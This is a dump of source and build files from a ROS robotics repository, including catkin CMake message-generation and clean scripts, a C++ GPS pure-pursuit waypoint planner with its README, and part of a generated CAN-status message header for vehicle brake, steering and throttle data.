"text": "file(REMOVE_RECURSE\n \"CMakeFiles/zf_msgs_generate_messages_lisp\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/devel/share/common-lisp/ros/zf_msgs/msg/pos320.lisp\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/devel/share/common-lisp/ros/zf_msgs/msg/pose2dArray.lisp\"\n)\n\n# Per-language clean rules from dependency scanning.\nforeach(lang )\n include(CMakeFiles/zf_msgs_generate_messages_lisp.dir/cmake_clean_${lang}.cmake OPTIONAL)\nendforeach()\n"
},
{
"alpha_fraction": 0.6206896305084229,
"alphanum_fraction": 0.7241379022598267,
"avg_line_length": 28,
"blob_id": "4dc78cde0d8251149717a40905023a101e453881",
"content_id": "00e3ce6b11bc3ca9ac49d62a2d6d54e7cb8cfa91",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 58,
"license_type": "no_license",
"max_line_length": 28,
"num_lines": 2,
"path": "/build/pos320/catkin_generated/pos320-msg-extras.cmake.develspace.in",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "set(pos320_MESSAGE_FILES \"\")\nset(pos320_SERVICE_FILES \"\")\n"
},
{
"alpha_fraction": 0.7604166865348816,
"alphanum_fraction": 0.7604166865348816,
"avg_line_length": 47,
"blob_id": "d8d9ef3aea88b170162e673f2dcf1cf581c03d2e",
"content_id": "572239282ac8cac16761eb1e9dca011176f97f00",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 192,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 4,
"path": "/build/steer/catkin_generated/installspace/steer-msg-paths.cmake",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "# generated from genmsg/cmake/pkg-msg-paths.cmake.installspace.in\n\n_prepend_path(\"${steer_DIR}/..\" \"\" steer_MSG_INCLUDE_DIRS UNIQUE)\nset(steer_MSG_DEPENDENCIES std_msgs;geometry_msgs;zf_msgs)\n"
},
{
"alpha_fraction": 0.7052023410797119,
"alphanum_fraction": 0.7572254538536072,
"avg_line_length": 42.25,
"blob_id": "27fa8bdb7bba8b48815fedfe4f07b59734f9567d",
"content_id": "72e755db446f69221e25c337f1a0a6b0dec3f083",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 173,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 4,
"path": "/build/pos320/catkin_generated/installspace/pos320-msg-paths.cmake",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "# generated from genmsg/cmake/pkg-msg-paths.cmake.installspace.in\n\n_prepend_path(\"${pos320_DIR}/..\" \"\" pos320_MSG_INCLUDE_DIRS UNIQUE)\nset(pos320_MSG_DEPENDENCIES std_msgs)\n"
},
{
"alpha_fraction": 0.7870967984199524,
"alphanum_fraction": 0.7870967984199524,
"avg_line_length": 37.75,
"blob_id": "a4bfb497664c48962bee8588c1f7c80fa2af0bf0",
"content_id": "9c91cb425677cbcf413590c9be37f0495de2a924",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 155,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 4,
"path": "/devel/share/steer/cmake/steer-msg-paths.cmake",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "# generated from genmsg/cmake/pkg-msg-paths.cmake.develspace.in\n\nset(steer_MSG_INCLUDE_DIRS \"\")\nset(steer_MSG_DEPENDENCIES std_msgs;geometry_msgs;zf_msgs)\n"
},
{
"alpha_fraction": 0.7781495451927185,
"alphanum_fraction": 0.7789216041564941,
"avg_line_length": 31.789030075073242,
"blob_id": "b4eb5151e9103092810e9db8565e95e3c3719912",
"content_id": "45a6ce00e176426568d5fe89b11ee3c1b3c28525",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 7771,
"license_type": "no_license",
"max_line_length": 204,
"num_lines": 237,
"path": "/build/steer/cmake/steer-genmsg.cmake",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "# generated from genmsg/cmake/pkg-genmsg.cmake.em\n\nmessage(WARNING \"Invoking generate_messages() without having added any message or service file before.\nYou should either add add_message_files() and/or add_service_files() calls or remove the invocation of generate_messages().\")\nmessage(STATUS \"steer: 0 messages, 0 services\")\n\nset(MSG_I_FLAGS \"-Istd_msgs:/opt/ros/kinetic/share/std_msgs/cmake/../msg;-Igeometry_msgs:/opt/ros/kinetic/share/geometry_msgs/cmake/../msg;-Izf_msgs:/home/zf/xuechong_ws/zhuifengShow0919/src/zf_msgs/msg\")\n\n# Find all generators\nfind_package(gencpp REQUIRED)\nfind_package(geneus REQUIRED)\nfind_package(genlisp REQUIRED)\nfind_package(gennodejs REQUIRED)\nfind_package(genpy REQUIRED)\n\nadd_custom_target(steer_generate_messages ALL)\n\n# verify that message/service dependencies have not changed since configure\n\n\n\n#\n# langs = gencpp;geneus;genlisp;gennodejs;genpy\n#\n\n### Section generating for lang: gencpp\n### Generating Messages\n\n### Generating Services\n\n### Generating Module File\n_generate_module_cpp(steer\n ${CATKIN_DEVEL_PREFIX}/${gencpp_INSTALL_DIR}/steer\n \"${ALL_GEN_OUTPUT_FILES_cpp}\"\n)\n\nadd_custom_target(steer_generate_messages_cpp\n DEPENDS ${ALL_GEN_OUTPUT_FILES_cpp}\n)\nadd_dependencies(steer_generate_messages steer_generate_messages_cpp)\n\n# add dependencies to all check dependencies targets\n\n# target for backward compatibility\nadd_custom_target(steer_gencpp)\nadd_dependencies(steer_gencpp steer_generate_messages_cpp)\n\n# register target for catkin_package(EXPORTED_TARGETS)\nlist(APPEND ${PROJECT_NAME}_EXPORTED_TARGETS steer_generate_messages_cpp)\n\n### Section generating for lang: geneus\n### Generating Messages\n\n### Generating Services\n\n### Generating Module File\n_generate_module_eus(steer\n ${CATKIN_DEVEL_PREFIX}/${geneus_INSTALL_DIR}/steer\n \"${ALL_GEN_OUTPUT_FILES_eus}\"\n)\n\nadd_custom_target(steer_generate_messages_eus\n DEPENDS ${ALL_GEN_OUTPUT_FILES_eus}\n)\nadd_dependencies(steer_generate_messages steer_generate_messages_eus)\n\n# add dependencies to all check dependencies targets\n\n# target for backward compatibility\nadd_custom_target(steer_geneus)\nadd_dependencies(steer_geneus steer_generate_messages_eus)\n\n# register target for catkin_package(EXPORTED_TARGETS)\nlist(APPEND ${PROJECT_NAME}_EXPORTED_TARGETS steer_generate_messages_eus)\n\n### Section generating for lang: genlisp\n### Generating Messages\n\n### Generating Services\n\n### Generating Module File\n_generate_module_lisp(steer\n ${CATKIN_DEVEL_PREFIX}/${genlisp_INSTALL_DIR}/steer\n \"${ALL_GEN_OUTPUT_FILES_lisp}\"\n)\n\nadd_custom_target(steer_generate_messages_lisp\n DEPENDS ${ALL_GEN_OUTPUT_FILES_lisp}\n)\nadd_dependencies(steer_generate_messages steer_generate_messages_lisp)\n\n# add dependencies to all check dependencies targets\n\n# target for backward compatibility\nadd_custom_target(steer_genlisp)\nadd_dependencies(steer_genlisp steer_generate_messages_lisp)\n\n# register target for catkin_package(EXPORTED_TARGETS)\nlist(APPEND ${PROJECT_NAME}_EXPORTED_TARGETS steer_generate_messages_lisp)\n\n### Section generating for lang: gennodejs\n### Generating Messages\n\n### Generating Services\n\n### Generating Module File\n_generate_module_nodejs(steer\n ${CATKIN_DEVEL_PREFIX}/${gennodejs_INSTALL_DIR}/steer\n \"${ALL_GEN_OUTPUT_FILES_nodejs}\"\n)\n\nadd_custom_target(steer_generate_messages_nodejs\n DEPENDS ${ALL_GEN_OUTPUT_FILES_nodejs}\n)\nadd_dependencies(steer_generate_messages steer_generate_messages_nodejs)\n\n# add 
dependencies to all check dependencies targets\n\n# target for backward compatibility\nadd_custom_target(steer_gennodejs)\nadd_dependencies(steer_gennodejs steer_generate_messages_nodejs)\n\n# register target for catkin_package(EXPORTED_TARGETS)\nlist(APPEND ${PROJECT_NAME}_EXPORTED_TARGETS steer_generate_messages_nodejs)\n\n### Section generating for lang: genpy\n### Generating Messages\n\n### Generating Services\n\n### Generating Module File\n_generate_module_py(steer\n ${CATKIN_DEVEL_PREFIX}/${genpy_INSTALL_DIR}/steer\n \"${ALL_GEN_OUTPUT_FILES_py}\"\n)\n\nadd_custom_target(steer_generate_messages_py\n DEPENDS ${ALL_GEN_OUTPUT_FILES_py}\n)\nadd_dependencies(steer_generate_messages steer_generate_messages_py)\n\n# add dependencies to all check dependencies targets\n\n# target for backward compatibility\nadd_custom_target(steer_genpy)\nadd_dependencies(steer_genpy steer_generate_messages_py)\n\n# register target for catkin_package(EXPORTED_TARGETS)\nlist(APPEND ${PROJECT_NAME}_EXPORTED_TARGETS steer_generate_messages_py)\n\n\n\nif(gencpp_INSTALL_DIR AND EXISTS ${CATKIN_DEVEL_PREFIX}/${gencpp_INSTALL_DIR}/steer)\n # install generated code\n install(\n DIRECTORY ${CATKIN_DEVEL_PREFIX}/${gencpp_INSTALL_DIR}/steer\n DESTINATION ${gencpp_INSTALL_DIR}\n )\nendif()\nif(TARGET std_msgs_generate_messages_cpp)\n add_dependencies(steer_generate_messages_cpp std_msgs_generate_messages_cpp)\nendif()\nif(TARGET geometry_msgs_generate_messages_cpp)\n add_dependencies(steer_generate_messages_cpp geometry_msgs_generate_messages_cpp)\nendif()\nif(TARGET zf_msgs_generate_messages_cpp)\n add_dependencies(steer_generate_messages_cpp zf_msgs_generate_messages_cpp)\nendif()\n\nif(geneus_INSTALL_DIR AND EXISTS ${CATKIN_DEVEL_PREFIX}/${geneus_INSTALL_DIR}/steer)\n # install generated code\n install(\n DIRECTORY ${CATKIN_DEVEL_PREFIX}/${geneus_INSTALL_DIR}/steer\n DESTINATION ${geneus_INSTALL_DIR}\n )\nendif()\nif(TARGET std_msgs_generate_messages_eus)\n add_dependencies(steer_generate_messages_eus std_msgs_generate_messages_eus)\nendif()\nif(TARGET geometry_msgs_generate_messages_eus)\n add_dependencies(steer_generate_messages_eus geometry_msgs_generate_messages_eus)\nendif()\nif(TARGET zf_msgs_generate_messages_eus)\n add_dependencies(steer_generate_messages_eus zf_msgs_generate_messages_eus)\nendif()\n\nif(genlisp_INSTALL_DIR AND EXISTS ${CATKIN_DEVEL_PREFIX}/${genlisp_INSTALL_DIR}/steer)\n # install generated code\n install(\n DIRECTORY ${CATKIN_DEVEL_PREFIX}/${genlisp_INSTALL_DIR}/steer\n DESTINATION ${genlisp_INSTALL_DIR}\n )\nendif()\nif(TARGET std_msgs_generate_messages_lisp)\n add_dependencies(steer_generate_messages_lisp std_msgs_generate_messages_lisp)\nendif()\nif(TARGET geometry_msgs_generate_messages_lisp)\n add_dependencies(steer_generate_messages_lisp geometry_msgs_generate_messages_lisp)\nendif()\nif(TARGET zf_msgs_generate_messages_lisp)\n add_dependencies(steer_generate_messages_lisp zf_msgs_generate_messages_lisp)\nendif()\n\nif(gennodejs_INSTALL_DIR AND EXISTS ${CATKIN_DEVEL_PREFIX}/${gennodejs_INSTALL_DIR}/steer)\n # install generated code\n install(\n DIRECTORY ${CATKIN_DEVEL_PREFIX}/${gennodejs_INSTALL_DIR}/steer\n DESTINATION ${gennodejs_INSTALL_DIR}\n )\nendif()\nif(TARGET std_msgs_generate_messages_nodejs)\n add_dependencies(steer_generate_messages_nodejs std_msgs_generate_messages_nodejs)\nendif()\nif(TARGET geometry_msgs_generate_messages_nodejs)\n add_dependencies(steer_generate_messages_nodejs geometry_msgs_generate_messages_nodejs)\nendif()\nif(TARGET 
zf_msgs_generate_messages_nodejs)\n add_dependencies(steer_generate_messages_nodejs zf_msgs_generate_messages_nodejs)\nendif()\n\nif(genpy_INSTALL_DIR AND EXISTS ${CATKIN_DEVEL_PREFIX}/${genpy_INSTALL_DIR}/steer)\n install(CODE \"execute_process(COMMAND \\\"/usr/bin/python\\\" -m compileall \\\"${CATKIN_DEVEL_PREFIX}/${genpy_INSTALL_DIR}/steer\\\")\")\n # install generated code\n install(\n DIRECTORY ${CATKIN_DEVEL_PREFIX}/${genpy_INSTALL_DIR}/steer\n DESTINATION ${genpy_INSTALL_DIR}\n )\nendif()\nif(TARGET std_msgs_generate_messages_py)\n add_dependencies(steer_generate_messages_py std_msgs_generate_messages_py)\nendif()\nif(TARGET geometry_msgs_generate_messages_py)\n add_dependencies(steer_generate_messages_py geometry_msgs_generate_messages_py)\nendif()\nif(TARGET zf_msgs_generate_messages_py)\n add_dependencies(steer_generate_messages_py zf_msgs_generate_messages_py)\nendif()\n"
},
{
"alpha_fraction": 0.5743434429168701,
"alphanum_fraction": 0.6066502928733826,
"avg_line_length": 30.694610595703125,
"blob_id": "bc3e1bf1a196d8b1578f1a4fe67e5e565973eb58",
"content_id": "b935903b6b0dce5b5a6e1931ef07ab12035ecd49",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 5293,
"license_type": "no_license",
"max_line_length": 190,
"num_lines": 167,
"path": "/src/path/src/gps_planner.cpp",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "#include \"ros/ros.h\"\n#include \"std_msgs/String.h\"\n#include \"std_msgs/Float32.h\"\n#include \"std_msgs/Int32.h\"\n#include \"nav_msgs/Path.h\"\n#include \"geometry_msgs/Point.h\"\n#include \"geometry_msgs/PoseArray.h\"\n#include \"geometry_msgs/Pose2D.h\"\n#include \"zf_msgs/pos320.h\"\n#include \"zf_msgs/pose2dArray.h\"\n#include <cmath>\n#include <Eigen/Dense>\n#include <iostream>\n#include <fstream>\n\n/**\n * XUECHONG 2018.09.06, pure pursuit path following\n * 2018.09.10 version 1.0, completely\n */\n\n/// earth radius is [m]\nconst double EARTH_RADIUS = 6371008.8;\nconst double PI = std::acos(-1);\n\n/// important parameters, need fine-tuning\nconst int LOOP_RATE_ = 20;\nzf_msgs::pos320 cur_pose;\n\nbool is_pose_set = false;\n\n/// convert lat,lon to xyz\ninline Eigen::Vector3d getXYZ(const double &lat, const double &lon){\n Eigen::Vector3d e(std::cos(lat/180.0 * PI) * std::cos(lon/180 * PI), std::cos(lat/180.0 * PI) * std::sin(lon/180 * PI), std::sin(lat/180.0 * PI));\n e[0] *= EARTH_RADIUS;\n e[1] *= EARTH_RADIUS;\n e[2] *= EARTH_RADIUS;\n return e;\n}\n\ninline Eigen::Vector3d getXYZe(const double &lat, const double &lon){\n Eigen::Vector3d e(std::cos(lat/180.0 * PI) * std::cos(lon/180 * PI), std::cos(lat/180.0 * PI) * std::sin(lon/180 * PI), std::sin(lat/180.0 * PI));\n return e;\n}\n\n//void currentPointCallback(const zf_msgs::pos320::ConstPtr& msg)\nvoid currentPointCallback(const zf_msgs::pos320& msg)\n{\n ///\n //ROS_INFO(\"I got current pose data: \");\n //ROS_INFO(msg->pose);\n cur_pose = msg;\n //std::cout<< cur_pose.lat << \"\\t\";\n //std::cout<< cur_pose.lon << \"\\n\";\n is_pose_set = true;\n}\n\nvoid loadMap(const std::string &filename, std::vector<Eigen::Vector3d> &map) {\n std::ifstream mapfile(filename);\n double lat, lon;\n while (mapfile >> lat >>lon) {\n map.push_back(getXYZ(lat,lon));\n std::cout<< std::setprecision(10)<< lat << \" \" << lon << std::endl;\n }\n std::cout << \"map length is \";\n std::cout<< map.size() << \"\\n\";\n}\n\nint main(int argc, char **argv)\n{\n /// load map\n std::vector<Eigen::Vector3d> map;\n loadMap(\"/home/zf/xuechong_ws/zhuifengShow0919/map/map.txt\",map);\n ROS_INFO_STREAM(\"finished loading map from file\");\n\n /// init node\n ros::init(argc, argv, \"path\");\n ros::NodeHandle n;\n /// subscribe current pos320 data and update is_pose_set\n ros::Subscriber subCurrentPoint = n.subscribe(\"pos320_pose\", 1000, currentPointCallback);\n /// publish waypoints\n ros::Publisher pubWaypoints = n.advertise<zf_msgs::pose2dArray>(\"gps_waypoints\", 1000);\n\n ROS_INFO_STREAM(\"pure pursuit start\");\n //ros::Rate loop_rate(LOOP_RATE_);\n ros::Rate loop_rate(20);\n while (ros::ok())\n {\n ros::spinOnce();\n if (!is_pose_set)\n {\n //ROS_WARN(\"Necessary current pos320 topics are not subscribed yet ... 
\");\n loop_rate.sleep();\n continue;\n }\n is_pose_set = false;\n\n /// current point n vector is, n is normal vector\n /// computing current faxiangliang, that is current coordinate\n Eigen::Vector3d n_vector = getXYZ(cur_pose.lat, cur_pose.lon);\n /// unit vector of faxiangliang\n Eigen::Vector3d ne_vector = getXYZe(cur_pose.lat, cur_pose.lon);\n /// nn\n Eigen::Vector3d nn_vector(-1 * ne_vector[0] * std::abs(ne_vector[2]), -1 * ne_vector[1] * std::abs(ne_vector[2]), std::abs(std::pow(ne_vector[0] ,2) + std::pow(ne_vector[1] ,2)) );\n /// \n Eigen::AngleAxisd rotation(cur_pose.head/ -180.0 * PI , ne_vector);\n Eigen::Vector3d now_forward = rotation * nn_vector;\n now_forward = now_forward.normalized();\n \n rotation = Eigen::AngleAxisd( (90 + cur_pose.head)/ -180.0 * PI , ne_vector);\n Eigen::Vector3d now_right = rotation * nn_vector;\n now_right = now_right.normalized();\n\n double dis = 999;\n int index = 0;\n int mark = 0;\n double right_dis = 0;\n double forward_dis = 0;\n \n for(Eigen::Vector3d &road_point:map){\n Eigen::Vector3d u_v = road_point - n_vector;\n ///std::cout<< road_point << \"\\n\\n\";\n ///std::cout<< n_vector << \"\\n\\n\";\n ///std::cout<< u_v << \"\\n\\n\";\n double forward = u_v.dot(now_forward);\n double right = u_v.dot(now_right);\n double temp = std::sqrt( std::pow(forward,2) + std::pow(right,2) );\n //if(temp< 20){std::cout<<temp << std::endl;}\n if(temp < dis && forward > 0){\n dis = temp;\n mark = index;\n right_dis = right;\n forward_dis = forward;\n }\n ++index;\n }\n std::cout<<\"nearest index:\"<< index << \"\\n\";\n std::cout<<\"nearest dis:\" << dis << \"\\n\";\n std::cout<<\" x y is \" << right_dis << \"\\t\" << forward_dis << \"\\n\\n\\n\";\n\n zf_msgs::pose2dArray waypoints;\n index = 0;\n for(int i=mark;i < map.size(); i++){\n Eigen::Vector3d u_v = map[i] - n_vector;\n double forward = u_v.dot(now_forward);\n double right = u_v.dot(now_right);\n double bias = std::sqrt( std::pow(right,2) + std::pow(forward,2) );\n /// distance between points from map must be longer than 0.4 meters\n if(bias - dis < 0.4 )\n {\n continue;\n }\n dis = bias;\n geometry_msgs::Pose2D pp;\n pp.x = right;\n pp.y = forward;\n pp.theta = 0;\n waypoints.points.push_back(pp);\n ++index;\n if(index > 50){break;}\n }\n pubWaypoints.publish(waypoints);\n std::cout<<\"planning ...\" <<\"\\n\";\n loop_rate.sleep();\n }\n\n return 0;\n}\n"
},
{
"alpha_fraction": 0.6706587076187134,
"alphanum_fraction": 0.7005987763404846,
"avg_line_length": 22.714284896850586,
"blob_id": "34af6502c38a54222054875eafa4228e5ab9f480",
"content_id": "60666feb4add0c5fd1b7323f5e2ec07d5593d3a7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 334,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 14,
"path": "/src/path/README.md",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "\n##gps planner\n\nsubscribed topics:\n pos320_pose, type is zf_msgs::pos320\n\npublished topics:\n gps_waypoints, type is zf_msgs::pose2dArray\n\n\n###map \n type is std::vector<Eigen::Vector3d> map\n loaded from a mapfile, filename is filled in line 66\n convert to x,y,z soon after loading it\n so, map is consitituted by (x,y,z)\n\n"
},
{
"alpha_fraction": 0.7626628279685974,
"alphanum_fraction": 0.7973950505256653,
"avg_line_length": 48.35714340209961,
"blob_id": "9109de20ad359fcfe9bec17bd851c8917d4b89b0",
"content_id": "1cf242265b3cfabd754e38fd19f1f8e5b80eb61e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 691,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 14,
"path": "/build/zfmsg/CMakeFiles/zfmsg_generate_messages_cpp.dir/cmake_clean.cmake",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "file(REMOVE_RECURSE\n \"CMakeFiles/zfmsg_generate_messages_cpp\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/devel/include/zfmsg/BreakStatus.h\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/devel/include/zfmsg/SteerStatus.h\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/devel/include/zfmsg/ThrottleGearStatus.h\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/devel/include/zfmsg/MotionCmd.h\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/devel/include/zfmsg/CanInfo.h\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/devel/include/zfmsg/CanInfoAW.h\"\n)\n\n# Per-language clean rules from dependency scanning.\nforeach(lang )\n include(CMakeFiles/zfmsg_generate_messages_cpp.dir/cmake_clean_${lang}.cmake OPTIONAL)\nendforeach()\n"
},
{
"alpha_fraction": 0.7524949908256531,
"alphanum_fraction": 0.7844311594963074,
"avg_line_length": 44.54545593261719,
"blob_id": "cf8db771de5dbce0c4ceccab591663c52611e7ad",
"content_id": "54f8e9dcb53c6049c22316e46a0173c291a3ce7c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 501,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 11,
"path": "/build/zf_msgs/CMakeFiles/zf_msgs_generate_messages_eus.dir/cmake_clean.cmake",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "file(REMOVE_RECURSE\n \"CMakeFiles/zf_msgs_generate_messages_eus\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/devel/share/roseus/ros/zf_msgs/msg/pos320.l\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/devel/share/roseus/ros/zf_msgs/msg/pose2dArray.l\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/devel/share/roseus/ros/zf_msgs/manifest.l\"\n)\n\n# Per-language clean rules from dependency scanning.\nforeach(lang )\n include(CMakeFiles/zf_msgs_generate_messages_eus.dir/cmake_clean_${lang}.cmake OPTIONAL)\nendforeach()\n"
},
{
"alpha_fraction": 0.6612967848777771,
"alphanum_fraction": 0.6753342151641846,
"avg_line_length": 30.101871490478516,
"blob_id": "eb5599ab71310603aff7159fe833dc8ea57d097e",
"content_id": "5dacf8a3b93f868cbfe5e5ab94f5005251febfd8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 14960,
"license_type": "no_license",
"max_line_length": 441,
"num_lines": 481,
"path": "/devel/include/zfmsg/CanInfo.h",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "// Generated by gencpp from file zfmsg/CanInfo.msg\n// DO NOT EDIT!\n\n\n#ifndef ZFMSG_MESSAGE_CANINFO_H\n#define ZFMSG_MESSAGE_CANINFO_H\n\n\n#include <string>\n#include <vector>\n#include <map>\n\n#include <ros/types.h>\n#include <ros/serialization.h>\n#include <ros/builtin_message_traits.h>\n#include <ros/message_operations.h>\n\n#include <std_msgs/Header.h>\n\nnamespace zfmsg\n{\ntemplate <class ContainerAllocator>\nstruct CanInfo_\n{\n typedef CanInfo_<ContainerAllocator> Type;\n\n CanInfo_()\n : header()\n , ts(0)\n , controlMode(0)\n , brakePressure(0.0)\n , brakeSpeed(0.0)\n , targetBrakePressure(0.0)\n , targetBrakeSpeed(0.0)\n , targetBrakePosition(0.0)\n , brakePosition(0.0)\n , breakPedalOn(false)\n , breakMotorCurrent(0.0)\n , breakErrorCode(0)\n , steerAngle(0.0)\n , steerSpeed(0.0)\n , targetSteerAngle(0.0)\n , targetSteerSpeed(0.0)\n , steerMotorTemperature(0.0)\n , steerMotorCurrent(0.0)\n , steerTorque(0.0)\n , resultSetMiddleZero(0.0)\n , steerErrorCode(0)\n , mainMotorSpeed(0.0)\n , mainMotorCurrent(0.0)\n , motorBreakOn(0)\n , throtle(0.0)\n , gear()\n , targetThrotle(0.0)\n , targetGear()\n , gearLeverPosition()\n , mainMotorBreakOn(false)\n , throttleErrorCode(0) {\n }\n CanInfo_(const ContainerAllocator& _alloc)\n : header(_alloc)\n , ts(0)\n , controlMode(0)\n , brakePressure(0.0)\n , brakeSpeed(0.0)\n , targetBrakePressure(0.0)\n , targetBrakeSpeed(0.0)\n , targetBrakePosition(0.0)\n , brakePosition(0.0)\n , breakPedalOn(false)\n , breakMotorCurrent(0.0)\n , breakErrorCode(0)\n , steerAngle(0.0)\n , steerSpeed(0.0)\n , targetSteerAngle(0.0)\n , targetSteerSpeed(0.0)\n , steerMotorTemperature(0.0)\n , steerMotorCurrent(0.0)\n , steerTorque(0.0)\n , resultSetMiddleZero(0.0)\n , steerErrorCode(0)\n , mainMotorSpeed(0.0)\n , mainMotorCurrent(0.0)\n , motorBreakOn(0)\n , throtle(0.0)\n , gear(_alloc)\n , targetThrotle(0.0)\n , targetGear(_alloc)\n , gearLeverPosition(_alloc)\n , mainMotorBreakOn(false)\n , throttleErrorCode(0) {\n (void)_alloc;\n }\n\n\n\n typedef ::std_msgs::Header_<ContainerAllocator> _header_type;\n _header_type header;\n\n typedef int64_t _ts_type;\n _ts_type ts;\n\n typedef uint8_t _controlMode_type;\n _controlMode_type controlMode;\n\n typedef float _brakePressure_type;\n _brakePressure_type brakePressure;\n\n typedef float _brakeSpeed_type;\n _brakeSpeed_type brakeSpeed;\n\n typedef float _targetBrakePressure_type;\n _targetBrakePressure_type targetBrakePressure;\n\n typedef float _targetBrakeSpeed_type;\n _targetBrakeSpeed_type targetBrakeSpeed;\n\n typedef float _targetBrakePosition_type;\n _targetBrakePosition_type targetBrakePosition;\n\n typedef float _brakePosition_type;\n _brakePosition_type brakePosition;\n\n typedef uint8_t _breakPedalOn_type;\n _breakPedalOn_type breakPedalOn;\n\n typedef float _breakMotorCurrent_type;\n _breakMotorCurrent_type breakMotorCurrent;\n\n typedef uint8_t _breakErrorCode_type;\n _breakErrorCode_type breakErrorCode;\n\n typedef float _steerAngle_type;\n _steerAngle_type steerAngle;\n\n typedef float _steerSpeed_type;\n _steerSpeed_type steerSpeed;\n\n typedef float _targetSteerAngle_type;\n _targetSteerAngle_type targetSteerAngle;\n\n typedef float _targetSteerSpeed_type;\n _targetSteerSpeed_type targetSteerSpeed;\n\n typedef float _steerMotorTemperature_type;\n _steerMotorTemperature_type steerMotorTemperature;\n\n typedef float _steerMotorCurrent_type;\n _steerMotorCurrent_type steerMotorCurrent;\n\n typedef float _steerTorque_type;\n _steerTorque_type steerTorque;\n\n typedef float 
_resultSetMiddleZero_type;\n _resultSetMiddleZero_type resultSetMiddleZero;\n\n typedef uint8_t _steerErrorCode_type;\n _steerErrorCode_type steerErrorCode;\n\n typedef float _mainMotorSpeed_type;\n _mainMotorSpeed_type mainMotorSpeed;\n\n typedef float _mainMotorCurrent_type;\n _mainMotorCurrent_type mainMotorCurrent;\n\n typedef uint8_t _motorBreakOn_type;\n _motorBreakOn_type motorBreakOn;\n\n typedef float _throtle_type;\n _throtle_type throtle;\n\n typedef std::basic_string<char, std::char_traits<char>, typename ContainerAllocator::template rebind<char>::other > _gear_type;\n _gear_type gear;\n\n typedef float _targetThrotle_type;\n _targetThrotle_type targetThrotle;\n\n typedef std::basic_string<char, std::char_traits<char>, typename ContainerAllocator::template rebind<char>::other > _targetGear_type;\n _targetGear_type targetGear;\n\n typedef std::basic_string<char, std::char_traits<char>, typename ContainerAllocator::template rebind<char>::other > _gearLeverPosition_type;\n _gearLeverPosition_type gearLeverPosition;\n\n typedef uint8_t _mainMotorBreakOn_type;\n _mainMotorBreakOn_type mainMotorBreakOn;\n\n typedef uint8_t _throttleErrorCode_type;\n _throttleErrorCode_type throttleErrorCode;\n\n\n\n\n\n typedef boost::shared_ptr< ::zfmsg::CanInfo_<ContainerAllocator> > Ptr;\n typedef boost::shared_ptr< ::zfmsg::CanInfo_<ContainerAllocator> const> ConstPtr;\n\n}; // struct CanInfo_\n\ntypedef ::zfmsg::CanInfo_<std::allocator<void> > CanInfo;\n\ntypedef boost::shared_ptr< ::zfmsg::CanInfo > CanInfoPtr;\ntypedef boost::shared_ptr< ::zfmsg::CanInfo const> CanInfoConstPtr;\n\n// constants requiring out of line definition\n\n\n\ntemplate<typename ContainerAllocator>\nstd::ostream& operator<<(std::ostream& s, const ::zfmsg::CanInfo_<ContainerAllocator> & v)\n{\nros::message_operations::Printer< ::zfmsg::CanInfo_<ContainerAllocator> >::stream(s, \"\", v);\nreturn s;\n}\n\n} // namespace zfmsg\n\nnamespace ros\n{\nnamespace message_traits\n{\n\n\n\n// BOOLTRAITS {'IsFixedSize': False, 'IsMessage': True, 'HasHeader': True}\n// {'std_msgs': ['/opt/ros/kinetic/share/std_msgs/cmake/../msg'], 'zfmsg': ['/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg']}\n\n// !!!!!!!!!!! 
